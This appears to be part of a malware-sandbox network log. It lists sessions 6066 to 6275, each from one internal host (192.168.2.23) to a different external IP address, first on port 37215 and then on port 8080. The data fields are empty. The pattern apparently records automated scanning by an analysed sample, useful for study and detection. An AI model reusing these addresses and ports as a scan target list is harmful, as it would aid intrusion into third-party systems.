                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6066192.168.2.2345078185.211.191.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6067192.168.2.234099841.77.174.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6068192.168.2.2358878197.203.225.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6069192.168.2.2347060157.132.190.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6070192.168.2.2356264157.64.173.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6071192.168.2.2333574197.6.253.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6072192.168.2.2351018197.24.13.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6073192.168.2.2341482197.104.245.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6074192.168.2.2352342157.72.200.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6075192.168.2.2349120157.34.71.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6076192.168.2.2355544157.165.115.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6077192.168.2.2355486157.91.46.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6078192.168.2.2360822157.48.1.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6079192.168.2.2337938157.240.102.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6080192.168.2.2344474197.234.0.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6081192.168.2.2348108197.44.75.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6082192.168.2.2348570197.203.178.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6083192.168.2.235411041.39.174.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6084192.168.2.2351706197.206.137.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6085192.168.2.2359666197.63.146.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6086192.168.2.233680441.25.58.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6087192.168.2.234124061.230.163.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6088192.168.2.234243641.28.129.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6089192.168.2.233882873.246.76.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6090192.168.2.234013241.230.154.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6091192.168.2.2342804174.31.103.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6092192.168.2.2355954197.211.117.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6093192.168.2.2357156179.173.40.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6094192.168.2.2333242197.179.203.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6095192.168.2.2342922197.65.78.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6096192.168.2.233567041.29.4.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6097192.168.2.2339898157.72.53.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6098192.168.2.234147641.117.18.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6099192.168.2.236098041.129.47.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6100192.168.2.234269441.122.4.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6101192.168.2.2343352157.116.60.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6102192.168.2.235223497.115.66.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6103192.168.2.2346546157.142.164.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6104192.168.2.2348114198.136.136.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6105192.168.2.233455841.93.91.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6106192.168.2.2338534157.130.158.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6107192.168.2.2350396101.17.89.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6108192.168.2.233785241.39.16.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6109192.168.2.2340404157.100.147.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6110192.168.2.234998641.66.170.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6111192.168.2.234423241.94.135.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6112192.168.2.2354548197.129.224.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6113192.168.2.2357308157.134.18.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6114192.168.2.234746247.255.38.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6115192.168.2.2336862218.136.74.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6116192.168.2.2341362220.243.229.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6117192.168.2.235184631.134.41.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6118192.168.2.2360522107.177.162.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6119192.168.2.234467693.204.173.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6120192.168.2.2349638154.141.48.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6121192.168.2.2351826168.243.103.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6122192.168.2.2339966216.178.47.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6123192.168.2.2360492149.31.20.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6124192.168.2.235067235.136.20.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6125192.168.2.235932452.43.26.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6126192.168.2.2355718111.141.148.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6127192.168.2.2341960201.183.200.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6128192.168.2.2333464139.228.189.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6129192.168.2.234864694.92.178.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6130192.168.2.2360218183.184.98.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6131192.168.2.2350718108.173.76.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6132192.168.2.2336248192.60.199.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6133192.168.2.2357462117.240.71.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6134192.168.2.2351998167.141.180.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6135192.168.2.2341780162.40.240.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6136192.168.2.2358882216.36.207.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6137192.168.2.2339524168.144.14.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6138192.168.2.234640836.165.12.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6139192.168.2.2360818106.254.112.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6140192.168.2.2344764176.140.222.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6141192.168.2.2341606219.120.204.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6142192.168.2.2336950201.115.175.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6143192.168.2.2347924158.92.216.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6144192.168.2.235080481.228.217.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6145192.168.2.2348508221.231.215.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6146192.168.2.2354148158.178.135.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6147192.168.2.235626681.11.193.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6148192.168.2.235854489.211.244.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6149192.168.2.2346428114.79.42.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6150192.168.2.235180895.140.124.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6151192.168.2.2342018122.167.3.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6152192.168.2.2333988119.129.144.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6153192.168.2.2354980223.51.3.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6154192.168.2.2338828203.250.136.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6155192.168.2.2333696190.96.193.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6156192.168.2.2336284182.119.74.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6157192.168.2.235181658.123.28.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6158192.168.2.2348122145.239.26.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6159192.168.2.235422050.137.198.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6160192.168.2.235149232.62.106.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6161192.168.2.2352550139.101.224.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6162192.168.2.235713087.189.137.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6163192.168.2.2353828133.180.236.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6164192.168.2.2359658198.86.242.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6165192.168.2.2358410158.35.11.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6166192.168.2.234756054.179.228.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6167192.168.2.235396442.208.36.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6168192.168.2.2343366181.219.88.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6169192.168.2.2333818129.22.38.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6170192.168.2.2343848122.202.24.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6171192.168.2.233817840.131.202.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6172192.168.2.2355092128.8.34.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6173192.168.2.235227683.136.188.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6174192.168.2.2346246159.39.10.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6175192.168.2.2347956158.191.8.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6176192.168.2.2342608167.209.90.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6177192.168.2.235118498.162.130.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6178192.168.2.233416848.28.166.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6179192.168.2.233412083.36.247.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6180192.168.2.2347786165.245.170.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6181192.168.2.233509818.244.68.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6182192.168.2.2349300139.182.40.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6183192.168.2.2350590201.89.13.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6184192.168.2.2354418166.48.239.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6185192.168.2.235912888.84.208.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6186192.168.2.2355532151.38.108.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6187192.168.2.235231083.7.57.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6188192.168.2.2343288110.128.71.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6189192.168.2.235145431.247.243.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6190192.168.2.2357132221.75.173.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6191192.168.2.2346866176.125.52.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6192192.168.2.2339408208.97.172.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6193192.168.2.234032697.236.166.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6194192.168.2.2355158204.169.8.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6195192.168.2.2339028111.77.49.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6196192.168.2.2337888175.195.73.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6197192.168.2.233802045.245.26.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6198192.168.2.233322896.89.135.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6199192.168.2.2358022210.202.70.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6200192.168.2.2343586163.177.106.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6201192.168.2.2344732206.252.101.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6202192.168.2.2349666137.77.225.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6203192.168.2.234089020.213.47.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6204192.168.2.2344544173.155.15.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6205192.168.2.2349854145.179.163.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6206192.168.2.23546029.224.55.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6207192.168.2.2344014220.186.159.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6208192.168.2.2353044128.251.7.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6209192.168.2.233285642.161.242.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6210192.168.2.2359126139.12.207.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6211192.168.2.2345886157.166.103.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6212192.168.2.235036237.44.12.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6213192.168.2.2332956161.239.58.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6214192.168.2.2342582201.241.33.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6215192.168.2.235361812.7.191.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6216192.168.2.2339364141.168.172.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6217192.168.2.2335878187.50.128.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6218192.168.2.234020665.197.76.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6219192.168.2.2345410105.151.198.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6220192.168.2.233963481.160.255.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6221192.168.2.23607244.9.233.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6222192.168.2.234191623.53.243.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6223192.168.2.2350500113.251.77.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6224192.168.2.2351444104.85.20.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6225192.168.2.234689870.152.190.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6226192.168.2.2346156148.135.109.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6227192.168.2.2356986123.235.16.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6228192.168.2.235863874.112.90.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6229192.168.2.2339612205.61.9.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6230192.168.2.2337420106.148.63.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6231192.168.2.2341500189.87.134.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6232192.168.2.236014640.233.174.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6233192.168.2.2339816171.35.208.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6234192.168.2.2346722145.60.230.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6235192.168.2.235969095.136.78.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6236192.168.2.235393475.78.105.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6237192.168.2.234286613.165.233.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6238192.168.2.235308636.210.192.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6239192.168.2.233756827.219.139.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6240192.168.2.235890664.236.202.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6241192.168.2.2334552156.58.131.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6242192.168.2.235714858.7.255.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6243192.168.2.235981844.9.40.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6244192.168.2.2355648158.63.60.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6245192.168.2.2360904135.81.66.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6246192.168.2.2335652165.33.151.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6247192.168.2.2338120173.129.51.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6248192.168.2.2344138116.22.236.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6249192.168.2.2342368153.183.36.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6250192.168.2.2350008166.132.158.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6251192.168.2.234134499.12.153.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6252192.168.2.2347976187.74.92.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6253192.168.2.234374663.122.253.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6254192.168.2.23524548.177.56.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6255192.168.2.234035617.73.202.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6256192.168.2.2344554148.81.181.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6257192.168.2.2350720194.86.166.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6258192.168.2.2335566205.126.85.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6259192.168.2.2347300112.126.89.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6260192.168.2.235131261.39.117.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6261192.168.2.233480059.240.165.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6262192.168.2.2342164207.211.167.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6263192.168.2.234523082.197.156.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6264192.168.2.2359716208.195.210.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6265192.168.2.2356264205.158.46.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6266192.168.2.2337658211.53.17.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6267192.168.2.2358104141.36.220.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6268192.168.2.2333846145.192.65.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6269192.168.2.2344872146.174.199.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6270192.168.2.2334220216.118.249.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6271192.168.2.2356018130.31.235.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6272192.168.2.234089251.46.176.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6273192.168.2.2339688144.28.27.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6274192.168.2.2342988185.221.107.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6275192.168.2.2359806186.228.137.1128080
                                                        TimestampBytes transferredDirectionData


